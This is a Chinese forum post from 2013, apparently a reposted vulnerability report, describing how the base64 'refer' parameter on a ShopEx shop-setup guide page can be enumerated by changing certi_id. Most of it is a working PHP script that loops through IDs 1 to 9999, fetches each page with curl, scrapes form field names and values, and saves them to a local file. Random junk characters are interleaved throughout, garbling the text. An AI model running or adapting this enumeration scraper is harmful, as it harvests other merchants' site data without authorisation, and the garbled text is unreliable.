|
|
简要描述:4 c5 j$ q) x' p
ShopEx某接口缺陷,可遍历所有网站6 v9 I% B9 l$ C- z8 b% q$ R
详细说明:8 y, L8 e2 C, d% F2 I: W2 l5 ?, o
问题出现在shopex 网店使用向导页面
! n& p1 N4 n& p1 R- g% G! _/ g
: [9 X Y7 I* O; A5 F; C. l: H2 U+ p) i/ |
. @. u5 F+ \, l' O( P9 [- D! J) a+ j
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
7 {, B' b: |9 e5 i& k: D: R
; L- e" t2 r5 c! m7 J
% Y9 g' ^0 _( N# T4 p+ k( w# M0 A0 c6 h i9 U' O$ b& u
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}) Z# t; d# f* O5 L* p; ?: r8 i4 f6 A
4 w+ u% ]6 c8 X+ y2 s0 R
) n8 Q% u( [ f
8 x, q) a4 L O: l& M' d
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 7 j) m4 s2 C: Z' y
8 { f# C* N' b- Z3 e6 i" j6 o9 z3 [
( V. l. N; @/ E! y4 z* j5 O" Q/ i) U2 }* l, w) B/ A9 _1 L
<?php$ S/ L/ d V: a: A
9 J+ Q! @, e2 n7 Y* {
for ($i=1; $i < 10000; $i++) { //遍历
5 `1 H- y% D$ Q% b; f$ E2 `0 P R2 W) l
ShowshopExD($i);
3 ]" y8 j! Y: G8 ^* K: d9 n' X$ B a( b: b8 y: N: T
}
% W/ ^7 ~8 P; s' p* V4 r7 C3 w0 O+ E: U h3 n& t" s/ ]( q
function ShowshopExD($cid) {
0 Y3 L* D+ e! G4 }! ]- `% z1 c- q5 @; ^8 P0 a% P6 [; k- H- S
$url='http://guide.ecos.shopex.cn/step2.php';
/ S& q ]. Z6 y
: S( r6 x! s. [6 t q $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 u' e7 E! S) q' N* L/ G+ ~1 U; p- z% {
$url = $url.'?refer='.$refer;' V7 }; w8 ~3 o3 X
" y I$ F% A! k* S4 D4 W
$ch = curl_init($url);7 `/ j/ Z. `1 m; _7 c( w
: O8 W/ y5 J# b* C; g" _/ U curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;$ y& C, G$ y! z& K, F: r- o
2 I2 V! v' _# b7 i
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;$ @' [2 `) n3 a: m! F- O
4 Z. C) T7 v1 N) n $result = curl_exec($ch);
( d4 \3 ]. N) W$ T% u1 q0 u0 j! T2 u; [0 W
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
: T2 l7 r M! z: _5 S$ @$ U+ d- H* J G4 O% v0 d' Q2 L
if(strpos($result,$refer))
) v0 J) E# x* U: H9 q L4 l/ g+ `6 V: x. C
{
& ?& O: f3 ]6 G- C" ~ o7 i* c* O- x7 P' E: k% j
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件. r2 n+ L4 l7 {3 }6 a
, J; _" m% l5 e/ h0 H preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
$ K: Z+ z- s5 W5 u/ h
$ v6 k O' M) h' X$ j8 ]7 I- t foreach ($value[1] as $key) {; ^6 ^. d5 C4 }: ?# ~1 R
% c U. I m* G/ r8 C; x9 y- g preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
/ K& L5 v- e" R% @9 `8 ^! D9 ^, @0 u% d; @" X
echo $res[1][0].':'.$res[3][0]."\r\n";
5 Q/ M- h9 G3 d' W5 W/ @) D% |" d
1 N/ f/ e$ k( z4 {2 Q& o, Y+ I $col =$res[1][0].':'.$res[3][0]."\r\n"; - b! f% j5 o! m+ x# l, R7 _+ e+ U: y
" \6 q. z' o6 ^1 O/ R, g
fwrite($fp, $col, strlen($col));
! ^5 N9 p& E, f5 ~6 ?
, q' v( N6 r* ?+ z }
0 I5 u- v# f2 H: S: U2 X9 S' m
* H/ P, K+ H: f; w, l; t( G1 M echo '--------------------------------'."\r\n";( p0 f5 r0 i6 [* X) d3 q! X
$ k7 p+ c$ P! C+ }3 m% l" q fclose($fp); $ l6 Y3 o: Q9 y8 y0 @
, l. f/ y: [( r% G }
) F' Z% W' t/ F- w1 A) i0 `( T
5 M3 q4 v- p' I flush();; h* y4 a# f4 R$ s- l0 M- ]; r a
( E# m5 c) J% _! d3 ]- ?
curl_close($ch);
$ z% T6 z( f8 I" a% ]( t' \0 I% s9 g) ^! D Q& E
}2 w0 B) v7 H1 I) T3 b
% R+ j% p7 P, K% F: \. X?>. E* @7 u; [& E! Z8 i8 H4 `( g
漏洞证明:
* e6 k0 ^0 }' N+ j4 jhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
6 ]% h( ~! h& a, hrefer换成其他加密方式
; ^/ J* t. i$ A* B# F: [ |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对